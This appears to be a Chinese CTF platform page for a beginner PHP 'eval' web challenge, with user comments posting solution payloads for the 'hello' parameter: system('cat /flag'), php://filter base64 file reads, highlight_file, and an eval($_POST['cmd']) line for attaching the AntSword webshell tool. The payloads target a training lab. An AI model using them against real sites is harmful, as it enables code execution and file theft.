evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18734
提  示:
描  述:
eval
评论
chm 2月前

http://171.80.2.169:19841/?hello=file(%22flag.php%22)

回复 1

yiya咿呀 2月前

url/?hello=eval(system('cat /flag'))

回复 0

道法自然 2月前

蚁剑直接 url/?hello=eval($_POST['cmd')

回复 0

1nfinix 3月前

构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//

回复 0

lins11 3月前

/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码

回复 0

叱咤月海鱼鱼猫 4月前

?hello=highlight_file('flag.php')

回复 1

banfang 5月前

点击场景后将代码发送给豆包等一分钟基本上就可以了

回复 0

pks0 5月前

?hello=1);highlight_file(%27flag.php%27);//

回复 1

一个姓⎝李⎠的师傅~ 6月前

知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d

回复 10
pipipikaqiu 3月前

写的好详细,太好了啊

回复 1

一个姓⎝李⎠的师傅~ 3月前

@想好思路再支付 有帮助就好,感谢老铁的认可!!!

回复 1

想好思路再支付 3月前

思路讲的真好啊李师傅

回复 1

ubudj 6月前

?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名

回复 1

WriteUp

image
harry

1 金币

评分(10)

解题动态

天天天天天天 攻破了该题 1小时前
记得开心一点 攻破了该题 1小时前
雨来越好 攻破了该题 2小时前
权汁味 攻破了该题 3小时前
HexHackerCat 攻破了该题 6小时前
胜天3号 攻破了该题 7小时前
15144954824 攻破了该题 1天前
dby 攻破了该题 1天前
Xa0ZH 攻破了该题 1天前
asuak 攻破了该题 3天前
hxp1989442012 攻破了该题 3天前
Anno 攻破了该题 4天前
你脸红个泡泡茶壶 攻破了该题 4天前
一只小白鲸 攻破了该题 5天前
yuesheng#1 攻破了该题 5天前
爱喝畅汁 攻破了该题 5天前
llaa 攻破了该题 5天前
逝水韶华 攻破了该题 5天前
谢特恒123 攻破了该题 5天前
永恩便利店 攻破了该题 5天前
问题反馈